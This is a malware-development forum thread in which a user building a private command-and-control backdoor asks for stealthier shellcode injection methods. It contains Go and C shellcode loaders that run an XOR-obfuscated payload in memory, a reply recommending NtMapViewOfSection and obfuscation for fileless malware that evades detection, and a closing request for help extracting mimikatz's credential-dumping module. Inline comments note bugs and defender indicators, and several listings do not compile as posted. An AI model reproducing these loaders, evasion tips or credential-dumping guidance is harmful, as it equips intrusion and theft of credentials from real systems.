
Malware Development C2 and Backdoor

Str0ng

Hello everyone, I have a C2 that I have been programming for a while. It has many functions: traffic encryption with a random key per request, HTTP or HTTPS as transport, generating shellcode, adding Word, Excel, etc. icons to Windows payloads, and it is multiplatform. My question: I want the opinion of all malware experts — does someone know or recommend a good technique to inject the shellcode into memory that is not the traditional one (VirtualAlloc, VirtualProtect, WriteProcessMemory, etc.), using only in-memory techniques without reading files, for example decrypting the shellcode with XOR or AES in memory and injecting it afterwards? Thank you, I await your recommendations or advice!

Код:
package main

/*
  simple shellcode loader example
*/
import (
    "unsafe"
    "syscall"
)

// Windows-only: syscall.MustLoadDLL / MustFindProc exist only in the
// Windows build of package syscall, so this file does not build for other
// GOOS values. Both lookups run at package init and panic if kernel32.dll
// or its VirtualProtect export cannot be resolved.
var  (
      kernel32          = syscall.MustLoadDLL("kernel32.dll")
      // Resolved at runtime (LoadLibrary/GetProcAddress style) rather than
      // through the PE import table, so static import-table inspection does
      // not necessarily show VirtualProtect for this binary.
      VirtualProtect    = kernel32.MustFindProc("VirtualProtect")
)

// main is the poster's skeleton: make the bytes of a Go slice executable
// and jump into them. As posted it is a template rather than a working
// program — see the notes on each line.
func main() {
     // A Go string, not a DWORD: VirtualProtect's lpflOldProtect parameter
     // expects a pointer to a 32-bit value, but &old below is the address
     // of the string header (data pointer + length), which the API then
     // overwrites.
     old         := ""
     // Empty placeholder. With len 0, &shellcode[0] panics with an
     // index-out-of-range error before any Windows API is reached.
     shellcode   := []byte{}
     // 0x40 = PAGE_EXECUTE_READWRITE. Protection is changed for the whole
     // page, so every Go heap object sharing it becomes RWX as well; an RWX
     // private heap page is one of the standard memory-scan indicators
     // defenders look for. The (always non-nil) error from Call is ignored.
     VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     // On Windows, syscall.Syscall treats its first argument as the address
     // of the procedure to call, so this transfers control into the slice on
     // the current goroutine's thread; control only comes back if the
     // payload returns.
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
 
You can do it in Go also it is pretty much similar
C:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


// msfvenom shellcode to start calc.exe (per the poster; not verifiable from
// the listing), stored XOR-obfuscated with the 5-byte key declared in main().
// Short repeating-key XOR is not encryption: wherever the plaintext has zero
// bytes the key itself shows through (the runs of 0x01..0x05 near the end
// appear to be exactly that), which is why the reply below recommends AES.
unsigned char encryptedShellcode[] = {
    0xfd,0x4a,0x80,0xe0,0xf5,0xed,0xc1,0x02,0x03,0x04,0x44,0x54,0x40,0x52,0x51,0x55,0x53,0x4d,0x30,0xd0,0x66,0x4c,0x8e,0x57,0x61,0x4a,0x88,0x56,0x1d,0x4d,0x8a,0x50,0x23,0x4c,0x8e,0x77,0x51,0x4a,0x0c,0xb3,0x4f,0x4f,0x4c,0x33,0xca,0x4c,0x34,0xc5,0xad,0x3e,0x62,0x78,0x07,0x29,0x21,0x43,0xc2,0xcd,0x08,0x44,0x00,0xc3,0xe1,0xe9,0x57,0x44,0x50,0x4a,0x88,0x56,0x25,0x8e,0x43,0x3e,0x4b,0x05,0xd5,0x8e,0x81,0x8a,0x03,0x04,0x05,0x4d,0x84,0xc2,0x77,0x63,0x4d,0x04,0xd1,0x52,0x88,0x4c,0x1d,0x41,0x8a,0x42,0x23,0x4d,0x04,0xd5,0xe2,0x54,0x4b,0xfb,0xcc,0x44,0x8a,0x36,0x8b,0x4c,0x04,0xd3,0x4c,0x33,0xca,0x4c,0x34,0xc5,0xad,0x43,0xc2,0xcd,0x08,0x44,0x00,0xc3,0x3b,0xe4,0x70,0xf4,0x4d,0x01,0x4f,0x20,0x0d,0x40,0x38,0xd3,0x76,0xdc,0x5d,0x41,0x8a,0x42,0x27,0x4d,0x04,0xd5,0x67,0x43,0x88,0x08,0x4d,0x41,0x8a,0x42,0x1f,0x4d,0x04,0xd5,0x40,0x89,0x07,0x8c,0x4d,0x04,0xd1,0x43,0x5b,0x45,0x5d,0x5b,0x58,0x58,0x42,0x5c,0x44,0x5c,0x40,0x58,0x4b,0x87,0xe9,0x25,0x40,0x50,0xfc,0xe4,0x5d,0x44,0x58,0x58,0x4b,0x8f,0x17,0xec,0x56,0xfd,0xfc,0xfb,0x58,0x4d,0xbb,0x03,0x03,0x04,0x05,0x05,0x01,0x02,0x03,0x4c,0x88,0x88,0x00,0x03,0x03,0x04,0x44,0xbf,0x30,0x89,0x6c,0x83,0xfa,0xd0,0xba,0xe2,0x1e,0x2e,0x0f,0x44,0xbb,0xa4,0x96,0xb9,0x98,0xfa,0xd4,0x4a,0x80,0xc0,0x2d,0x39,0x07,0x7e,0x09,0x84,0xfe,0xe5,0x74,0x07,0xb8,0x43,0x16,0x77,0x6e,0x68,0x03,0x5d,0x44,0x8c,0xdb,0xfd,0xd6,0x67,0x64,0x69,0x62,0x02
};


/* Prototype declares a void return, but the definition at the bottom of the
   listing returns unsigned char * — conflicting types, so the file does not
   compile as posted. */
void XorByInputKey(unsigned char *pShellcode, size_t sShellcodeSize, unsigned char *pKey, size_t sKeySize);

/*
 * main — the local-process loader posted in the thread (Windows only).
 * As posted it does not compile: `shellcode` is never declared, and the
 * prototype above declares XorByInputKey as void while the definition below
 * returns unsigned char *. The getchar() pauses are purely interactive; the
 * sequence itself (private RW allocation -> copy -> RW->RWX flip -> new
 * thread starting in non-image memory) is the textbook pattern that
 * EDR/ETW-based detection keys on.
 */
int main(int argc, char* argv[]) {
    /* five-byte repeating XOR key; see the note on encryptedShellcode */
    unsigned char key[] = { 0x01, 0x02, 0x03, 0x04, 0x05 };
    size_t keySize = sizeof(key) / sizeof(key[0]);
    PBYTE       pDeobfuscatedPayload  = NULL;   /* declared but never used */
   // SIZE_T      sDeobfuscatedSize     =    0;

    printf("[i] Injecting Shellcode The Local Process Of Pid: %d \n", GetCurrentProcessId());
    printf("[#] Press <Enter> To Decrypt ... ");
    getchar();

    printf("[i] Decrypting ...");
   
    /* `shellcode` is not declared anywhere in the listing. XorByInputKey
       decodes encryptedShellcode in place and returns the same pointer, so
       the decoded bytes live in the global array from here on. */
    shellcode = XorByInputKey(encryptedShellcode, sizeof(encryptedShellcode), key, keySize);

    printf("[+] DONE !\n");
    /* If `shellcode` is a pointer, as the assignment implies, this is
       sizeof(pointer), not the payload length — only that many bytes are
       copied, protected and executed below. */
    SIZE_T sDeobfuscatedSize = sizeof(shellcode);
    printf("[i] Deobfuscated Payload At : 0x%p Of Size : %d \n", shellcode, sDeobfuscatedSize);

    printf("[#] Press <Enter> To Allocate ... ");
    getchar();
    /* private, non-image-backed region; it is flipped to RWX further down,
       and that RW->RWX transition on private memory is a common detection
       signal in its own right */
    PVOID pShellcodeAddress = VirtualAlloc(NULL, sDeobfuscatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pShellcodeAddress == NULL) {
        printf("[!] VirtualAlloc Failed With Error : %d \n", GetLastError());
        return -1;
    }
    printf("[i] Allocated Memory At : 0x%p \n", pShellcodeAddress);

    printf("[#] Press <Enter> To Write Payload ... ");
    getchar();
    memcpy(pShellcodeAddress, shellcode, sDeobfuscatedSize);
    /* zeroes (part of) the decoded global copy; the executable copy remains
       in the VirtualAlloc region, so a memory scan still sees the plaintext */
    memset(encryptedShellcode, 0, sDeobfuscatedSize);


    DWORD dwOldProtection = 0;

    if (!VirtualProtect(pShellcodeAddress, sDeobfuscatedSize, PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
        printf("[!] VirtualProtect Failed With Error : %d \n", GetLastError());
        return -1;
    }

    printf("[#] Press <Enter> To Run ... ");
    getchar();
    /* thread start address inside private memory rather than a mapped
       image — the classic "thread start in unbacked region" indicator.
       The returned HANDLE is discarded, so the thread is never joined or
       closed. */
    if (CreateThread(NULL, 0, pShellcodeAddress, NULL, 0, NULL) == NULL) {
        printf("[!] CreateThread Failed With Error : %d \n", GetLastError());
        return -1;
    }

    /* wrong allocator: the region came from VirtualAlloc, not the process
       heap (already pointed out in the replies), and it is being released
       while the thread just created may still be running from it */
    HeapFree(GetProcessHeap(), 0, pShellcodeAddress);
    printf("[#] Press <Enter> To Quit ... ");
    getchar();
    return 0;
}


/*
 * In-place repeating-key XOR over pShellcode; returns pShellcode itself.
 * The reset condition is `j > sKeySize`, so j reaches sKeySize before it is
 * reset and pKey[sKeySize] — one element past the key array — is read once
 * per cycle.
 */
unsigned char * XorByInputKey(unsigned char *pShellcode, size_t sShellcodeSize,unsigned char *pKey , size_t sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j > sKeySize){
            j = 0;
        }
        pShellcode[i] = pShellcode[i] ^ pKey[j];
    }
    return pShellcode;
}
XOR encryption is not as good as AES, but it can be useful; I suggest using AES. For executing the shellcode we used the CreateThread WinAPI function. You can also use a function pointer, but I don't recommend it because it will terminate the program as soon as the shellcode has executed.
 
You can do it in Go also it is pretty much similar
Хорошо тебе наверное освобождать память, выделенную VirtualAlloc при помощи HeapFree ...
 
да, мы сделали это
Хорошо тебе наверное освобождать память, выделенную VirtualAlloc при помощи HeapFree ...
HeapFree(GetProcessHeap(), 0, pShellcodeAddress); <=====
 
да, мы сделали это

HeapFree(GetProcessHeap(), 0, pShellcodeAddress); <=====
PVOID pShellcodeAddress = VirtualAlloc(NULL, sDeobfuscatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); <=====

ruskiy ne ponimaesh ?
 
This works perfectly, but I am looking for a new or not commonly used method to inject or load shellcode.
Код:
package main

import (
    "fmt"
    "unsafe"
    "syscall"
    "io/ioutil"
)

// Windows-only: the syscall DLL helpers below exist only in the Windows
// build of package syscall, and both lookups panic at package init if
// kernel32.dll or its VirtualProtect export cannot be resolved.
var  (
      kernel32          = syscall.MustLoadDLL("kernel32.dll")
      // resolved at runtime rather than via the PE import table
      VirtualProtect    = kernel32.MustFindProc("VirtualProtect")
      // single-byte placeholders standing in for a real blob and key;
      // DecryptXORShellode only ever uses the first key byte
      CryptedShellcode  = []byte{126}
      CryptedShellcodeKey = []byte{22}
)

// DecryptXORShellode XORs every byte of ShellCodeWithXor with XORKey[0]
// and returns the result in a new slice. Only the first key byte is ever
// used, so a longer key is not applied as a rolling key. An empty input
// yields an empty, non-nil slice; a non-empty input with an empty key
// panics on the key index.
func DecryptXORShellode(ShellCodeWithXor []byte, XORKey []byte) []byte {
	out := make([]byte, 0, len(ShellCodeWithXor))
	for i := range ShellCodeWithXor {
		out = append(out, ShellCodeWithXor[i]^XORKey[0])
	}
	return out
}

// main decodes the one-byte placeholder and transfers control to it
// in-process. Note that the listing imports io/ioutil without using it, so
// as posted it does not compile.
func main() {
     shellcode := DecryptXORShellode(CryptedShellcode, CryptedShellcodeKey)
     // lpflOldProtect is given the address of a single byte; VirtualProtect
     // stores a 4-byte DWORD there, i.e. past the end of that 1-byte slice.
     // 0x40 = PAGE_EXECUTE_READWRITE and applies to the whole page holding
     // the Go heap object, so neighbouring heap objects become RWX too —
     // an RWX private page in a Go heap is a standard memory-scan finding.
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&[]byte{255}[0])))
     // (*Proc).Call's error is documented as always non-nil (an Errno, 0 on
     // success), so printing it does not by itself indicate success or
     // failure.
     fmt.Println(e)
     // On Windows, syscall.Syscall calls the procedure at the address given
     // as its first argument, so this jumps into the slice on the current
     // thread; control returns only if the code there returns.
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
 
Looks like you're delving deep into shellcode injection! 🤔 If you're avoiding traditional APIs, consider using `NtMapViewOfSection` or `ZwMapViewOfSection`. They are often used for fileless malware and can help keep things in-memory. Another technique worth exploring is leveraging callbacks or hooks in system processes. Also, staying in user mode and avoiding detection is key—obfuscate your shellcode and decryption techniques.
thanks yes I'm developing a private multiplatform c2, and it also has loader, backdoor, modules not yet but that's the idea,
and well I see that you have more knowledge than me maybe, so since this is it, could you have some information on how they work or compile the mimikatz modules separately, because I only want to take the sekurlsa module with the function of dumping ntlm hashes/credentials without using the rest of the mimikatz code, but I still don't know how:))

i think is something like this -> https://blog.compass-security.com/2023/04/compiling-a-mimikatz-module-for-dumping-citrix-credz/
 

